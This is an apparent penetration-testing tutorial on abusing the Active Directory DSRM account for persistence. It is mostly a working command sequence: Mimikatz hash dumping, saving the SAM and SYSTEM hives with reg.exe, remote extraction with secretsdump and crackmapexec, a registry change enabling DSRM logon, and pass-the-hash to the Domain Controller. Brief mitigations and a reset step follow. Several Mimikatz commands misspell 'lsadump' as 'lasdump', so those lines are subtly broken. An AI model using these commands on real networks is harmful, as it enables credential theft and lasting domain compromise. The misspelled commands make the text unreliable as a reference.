Directory Services Restore Mode (DSRM)

In every domain there is a Domain Admin named 'Administrator'. However, on every Domain Controller there is also a local Administrator. These two users are different.

How can we tell?

If you have Domain Admin privileges, dump both the SAM and the NTDS and you will get two different hashes for 'Administrator'.

The differences can also be seen using these Mimikatz commands respectively as well:

Invoke-Mimikatz -Command '"token::elevate" "lasdump::sam"'
Invoke-Mimikatz -Command '"lasdump::lsa /patch"'

The Administrator hash from the SAM dump belongs to the local Administrator and the NTDS hash to the Domain Administrator.

The local Administrator on the DC is also known as the DSRM account.

What does this mean?

In general, the local Administrator account is hardly used on a running DC. However, to configure a Domain Controller, we are prompted to enter a DSRM password for the local Administrator. This provides a backup method for the Domain Admins to access the DC and the database.

This means that obtaining the local DC Administrator hash and then passing it provides another long-term method of persistence. It can be quite effective because the DSRM password is rarely changed.

As the local Admin is usually not able to logon to the DC, we must first make sure that we will be able to logon by changing the "DsrmAdminLogonBehavior" registry key. This will be a significant downgrade to the security of the Domain Controller. Therefore, if you are on a live engagement, make sure to check with your client that this is allowable.

Once we have the hash we can either use that hash and pass it to access the DC or we can follow up with a DCSync attack and pull up the passwords for any account you wish, including the krbtgt.

Steps

Step 1 - Dump the SAM of the DC to Obtain the DSRM Hash

• Method 1: From Powershell - Use Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lasdump::sam"'

• Method 2: Copy the SAM and system hives, download them, then run secretsdump.py from impacket to extract the hash

# using reg.exe
cmd.exe /c 'reg.exe save hklm\sam c:\windows\temp\sam.bak'
cmd.exe /c 'reg.exe save hklm\system c:\windows\temp\system.bak'

# after copying the files to your machine run secretsdump.py
python secretsdump.py -sam sam.bak -system system.bak LOCAL

• Method 3: From Linux - use crackmapexec or secretsdump.py to extract the hash remotely

# crackmapexec
crackmapexec smb <dc-ip> -u <user> -p <pass> --sam

# secretsdump.py
sudo python3 secretsdump.py <user>@<domain> -dc-ip <ip>

Step 2 - Setup to Authenticate as local Admin

From the DC...

# Check if 'DsrmAdminLogonBehavior' property exists
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

# If there is no value, create a new property and set it to 2
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Then check again and make sure 'DsrmAdminLogonBehavior' is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

Step 3 - Pass the hash

• From another machine, attempt to logon to the DC

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<dc.domain> /user:Administrator /ntlm:<DSRM-hash> /run:powershell.exe"'

# From your new window check your access to the DC
ls \\<dc.domain>\C$

To reset the "DsrmAdminLogonBehavior" Property

# If the property didn't exist beforehand
Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"

# If there was a "DsrmAdminLogonBehavior" registry key set prior
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name "DsrmAdminLogonBehavior" -Value <prior_value>

Mitigations

• Change the DSRM password regularly

• Check regularly for events with ID 4657 or 4794

• Make sure DSRM passwords are unqiue for each DC